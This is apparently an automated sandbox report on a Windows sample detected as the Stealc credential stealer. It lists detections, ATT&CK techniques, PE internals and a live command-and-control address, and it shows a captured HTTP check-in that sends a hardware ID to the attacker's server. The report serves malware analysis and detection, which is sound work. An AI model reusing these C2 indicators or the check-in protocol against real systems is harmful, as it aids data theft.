              Source: Yara matchFile source: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2186915935.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 404, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2186915935.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 404, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe42%ReversingLabsWin32.Trojan.Generic
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/405117-2476756634-1003u100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpJA100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpoIHH100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php5IfH100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpfA100%Avira URL Cloudmalware
              http://185.215.113.206/YIzH100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/false
                		high
                http://185.215.113.206/c4becf79229cb002.phpfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.phpJAfile.exe, 00000000.00000002.2236827089.00000000011FC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.215.113.206//file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://185.215.113.206/c4becf79229cb002.phpoIHHfile.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206/c4becf79229cb002.phpfAfile.exe, 00000000.00000002.2236827089.00000000011FC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206/405117-2476756634-1003ufile.exe, 00000000.00000002.2236827089.00000000011D2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206/_file.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/c4becf79229cb002.php5IfHfile.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://185.215.113.206file.exe, 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2236827089.00000000011D2000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206/c4becf79229cb002.phptfile.exe, 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206/Ifile.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://185.215.113.206/hfile.exe, 00000000.00000002.2236827089.00000000011E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://185.215.113.206/YIzHfile.exe, 00000000.00000002.2236827089.0000000001205000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.206
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1560591
                                Start date and time:2024-11-22 01:01:10 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 48s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:20
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 18
                                • Number of non-executed functions: 119
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.206file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php
                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/68b591d6548ec281/sqlite3.dll
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/c4becf79229cb002.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaCBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousLummaCBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousAmadey, XWormBrowse
                                • 185.215.113.43
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                • 185.215.113.206

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.9457252384276105
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'799'168 bytes
                                MD5:7f133608117d2d14e36a7b73d6c173af
                                SHA1:b0d7ad4e7b66129b16512761d4a86303b5928a81
                                SHA256:3806b9f4eb73630796343fa069a80fc29705bd31f719ab9ad8841a17f225b8c4
                                SHA512:1434642cfce942003bce803deba580aff7f420a1c0868ff43b6c891039568b6513667f4c14ec421c37dbcb8a7e3b9b3c9c256beed476cc1099f396d9bd5ae90e
                                SSDEEP:49152:anx5e/w4qYaUEHrsqpiUIcHfHfgJQrLo+MwudQ:axcwUavHrsqNIcHfYJG1uS
                                TLSH:9A8533A5AF6D68BCCBAD22F4C5F746AC30159F531C835FFB278D6AA58423426523390C
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0xa93000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007FBF64DBE07Ah
                                rsqrtps xmm3, dqword ptr [ebx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [edi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add al, 00h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [edi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], al
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, byte ptr [edx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x2490000x16200cea3532d3ed38884aa27d5f225bc4f94unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x24a0000x1ac0x200c1e63df86005f995382478d67f49befeFalse0.580078125data4.53896021780146IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x24c0000x2a80000x200d26c997ddab76051e245abab38aaf71bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                tlwqldfy0x4f40000x19e0000x19d6000617375298944b055391135b1507d256False0.9948204093589356data7.954230564423373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                yxhtoyxo0x6920000x10000x400d955a26e52bba2aed5331f09222c20c1False0.80859375data6.332395039142567IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x6930000x30000x220071eda8790a3fb1bb25b6cb7a0f4a5053False0.06043198529411765DOS executable (COM)0.7951683213729465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_MANIFEST0x6914480x152ASCII text, with CRLF line terminators0.6479289940828402

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-11-22T01:02:14.488656+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649717185.215.113.20680TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 22, 2024 01:02:12.516822100 CET4971780192.168.2.6185.215.113.206
                                Nov 22, 2024 01:02:12.636511087 CET8049717185.215.113.206192.168.2.6
                                Nov 22, 2024 01:02:12.636600018 CET4971780192.168.2.6185.215.113.206
                                Nov 22, 2024 01:02:12.637273073 CET4971780192.168.2.6185.215.113.206
                                Nov 22, 2024 01:02:12.756809950 CET8049717185.215.113.206192.168.2.6
                                Nov 22, 2024 01:02:14.029403925 CET8049717185.215.113.206192.168.2.6
                                Nov 22, 2024 01:02:14.029479027 CET4971780192.168.2.6185.215.113.206
                                Nov 22, 2024 01:02:14.033570051 CET4971780192.168.2.6185.215.113.206
                                Nov 22, 2024 01:02:14.153141975 CET8049717185.215.113.206192.168.2.6
                                Nov 22, 2024 01:02:14.488584995 CET8049717185.215.113.206192.168.2.6
                                Nov 22, 2024 01:02:14.488656044 CET4971780192.168.2.6185.215.113.206
                                Nov 22, 2024 01:02:17.308540106 CET4971780192.168.2.6185.215.113.206

                                HTTP Request Dependency Graph

                                • 185.215.113.206

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.649717185.215.113.20680404C:\Users\user\Desktop\file.exe
                                TimestampBytes transferredDirectionData
                                Nov 22, 2024 01:02:12.637273073 CET90OUTGET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Nov 22, 2024 01:02:14.029403925 CET203INHTTP/1.1 200 OK
                                Date: Fri, 22 Nov 2024 00:02:13 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Nov 22, 2024 01:02:14.033570051 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKF
                                Host: 185.215.113.206
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 30 32 33 37 38 39 35 39 38 31 36 32 32 33 35 37 33 34 35 32 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 2d 2d 0d 0a
                                Data Ascii: ------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="hwid"2023789598162235734526------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="build"mars------KFCBAEHCAEGDHJKFHJKF--
                                Nov 22, 2024 01:02:14.488584995 CET210INHTTP/1.1 200 OK
                                Date: Fri, 22 Nov 2024 00:02:14 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:19:02:08
                                Start date:21/11/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0x3e0000
                                File size:1'799'168 bytes
                                MD5 hash:7F133608117D2D14E36A7B73D6C173AF
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2236827089.000000000118E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2186915935.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:16.3%
                                  Total number of Nodes:1403
                                  Total number of Limit Nodes:28
                                  execution_graph 27116 403cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27153 4033c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27135 3ef639 144 API calls 27138 3e16b9 200 API calls 27141 3ebf39 177 API calls 27154 3fabb2 120 API calls 27117 402cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27106 402853 lstrcpy 27142 3f4b29 304 API calls 27155 3f23a9 298 API calls 27128 402d60 11 API calls 27143 402b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27156 3f8615 47 API calls 27118 3f2499 290 API calls 27157 3edb99 672 API calls 25669 401bf0 25721 3e2a90 25669->25721 25673 401c03 25674 401c29 lstrcpy 25673->25674 25675 401c35 25673->25675 25674->25675 25676 401c65 ExitProcess 25675->25676 25677 401c6d GetSystemInfo 25675->25677 25678 401c85 25677->25678 25679 401c7d ExitProcess 25677->25679 25822 3e1030 GetCurrentProcess VirtualAllocExNuma 25678->25822 25684 401ca2 25685 401cb8 25684->25685 25686 401cb0 ExitProcess 25684->25686 25834 402ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25685->25834 25688 401ce7 lstrlen 25693 401cff 25688->25693 25689 401cbd 25689->25688 26043 402a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25689->26043 25691 401cd1 25691->25688 25696 401ce0 ExitProcess 25691->25696 25692 401d23 lstrlen 25694 401d39 25692->25694 25693->25692 25695 401d13 lstrcpy lstrcat 25693->25695 25697 401d5a 25694->25697 25698 401d46 lstrcpy lstrcat 25694->25698 25695->25692 25699 402ad0 3 API calls 25697->25699 25698->25697 25700 401d5f lstrlen 25699->25700 25703 401d74 25700->25703 25701 401d9a lstrlen 25702 401db0 25701->25702 25705 401dce 25702->25705 25706 401dba lstrcpy lstrcat 25702->25706 25703->25701 25704 401d87 lstrcpy lstrcat 25703->25704 25704->25701 25836 402a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25705->25836 25706->25705 25708 401dd3 lstrlen 25709 401de7 25708->25709 25710 401df7 lstrcpy lstrcat 25709->25710 25711 401e0a 25709->25711 25710->25711 25712 401e28 lstrcpy 25711->25712 25713 401e30 25711->25713 25712->25713 25714 401e56 OpenEventA 25713->25714 25715 401e68 CloseHandle Sleep OpenEventA 25714->25715 25716 401e8c CreateEventA 25714->25716 25715->25715 25715->25716 25837 401b20 GetSystemTime 25716->25837 25720 401ea5 CloseHandle ExitProcess 26044 3e4a60 25721->26044 25723 3e2aa1 25724 3e4a60 2 API calls 25723->25724 25725 3e2ab7 25724->25725 25726 3e4a60 2 API calls 25725->25726 25727 3e2acd 25726->25727 25728 3e4a60 2 API calls 25727->25728 25729 3e2ae3 25728->25729 25730 3e4a60 2 API calls 25729->25730 25731 3e2af9 25730->25731 25732 3e4a60 2 API calls 25731->25732 25733 3e2b0f 25732->25733 25734 3e4a60 2 API calls 25733->25734 25735 3e2b28 25734->25735 25736 3e4a60 2 API calls 25735->25736 25737 3e2b3e 25736->25737 25738 3e4a60 2 API calls 25737->25738 25739 3e2b54 25738->25739 25740 3e4a60 2 API calls 25739->25740 25741 3e2b6a 25740->25741 25742 3e4a60 2 API calls 25741->25742 25743 3e2b80 25742->25743 25744 3e4a60 2 API calls 25743->25744 25745 3e2b96 25744->25745 25746 3e4a60 2 API calls 25745->25746 25747 3e2baf 25746->25747 25748 3e4a60 2 API calls 25747->25748 25749 3e2bc5 25748->25749 25750 3e4a60 2 API calls 25749->25750 25751 3e2bdb 25750->25751 25752 3e4a60 2 API calls 25751->25752 25753 3e2bf1 25752->25753 25754 3e4a60 2 API calls 25753->25754 25755 3e2c07 25754->25755 25756 3e4a60 2 API calls 25755->25756 25757 3e2c1d 25756->25757 25758 3e4a60 2 API calls 25757->25758 25759 3e2c36 25758->25759 25760 3e4a60 2 API calls 25759->25760 25761 3e2c4c 25760->25761 25762 3e4a60 2 API calls 25761->25762 25763 3e2c62 25762->25763 25764 3e4a60 2 API calls 25763->25764 25765 3e2c78 25764->25765 25766 3e4a60 2 API calls 25765->25766 25767 3e2c8e 25766->25767 25768 3e4a60 2 API calls 25767->25768 25769 3e2ca4 25768->25769 25770 3e4a60 2 API calls 25769->25770 25771 3e2cbd 25770->25771 25772 3e4a60 2 API calls 25771->25772 25773 3e2cd3 25772->25773 25774 3e4a60 2 API calls 25773->25774 25775 3e2ce9 25774->25775 